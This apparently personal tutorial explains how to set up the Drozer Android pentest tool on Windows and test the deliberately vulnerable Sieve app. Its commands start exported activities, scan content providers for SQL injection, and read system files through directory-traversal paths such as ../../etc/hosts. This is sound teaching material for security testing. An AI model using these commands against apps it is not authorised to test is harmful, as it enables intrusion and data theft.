What is Drozer?
Drozer is a free and powerful android pentest tool that can be used for dynamic analysis for android application security assessment.
[Windows 10] My lab setup
I perform my android pentest on my windows 10 host machine, the following are my setups:
- Python v2.7
- Drozer v2.4.4
- Other dependencies
pip install protobuf
pip install PyOpenssl
pip install twisted
pip install service_identity
4. Drozer agent v2.3.4 apk
- install drozer-agent.apk into android emulator
5. Nox player (android emulator)
6. Sieve apk (vulnerable application)
[CMD] Start a drozer session
- open drozer-agent application inside android emulator, toggle it on.
2. open CMD inside windows host machine, type the following to establish communication between drozer and drozer-agent.
adb forward tcp:31415 tcp:31415
3. open CMD inside windows host machine, type the following to start drozer.
drozer console connect
[Drozer] Find the package name of the vulnerable application
run app.package.list -f <string>
[Drozer] Show package information
run app.package.info -a <package_name>
[Drozer] Identify attack surface
run app.package.attacksurface <package_name>
[Drozer] Exploit exported activities
List exported activities
run app.activity.info -a <package_name>
Invoke exported activities
run app.activity.start -a <package_name> <exported_activity_name>
[Drozer] Exploit exported content providers
Find accessible content URIs
run scanner.provider.finduris -a <package_name>
SQLi vulnerability
List accessible SQLi injection points and accessible content URIs.
run scanner.provider.injection -a <package_name>
Display SQL tables for the package name if it is vulnerable to SQLi.
run scanner.provider.sqltables -a <package_name>
[CRUD] query the content.
[CRUD] insert the content.
[CRUD] update the content.
[CRUD] delete the content.
Directory traversal vulnerability
List accessible content URIs that is vulnerable to directory traversal.
run scanner.provider.traversal -a <package_name>
Exploit directory traversal vulnerability.
run app.provider.read <content_uri>../../etc/hosts
run app.provider.read <content_uri>../../proc/cpuinfo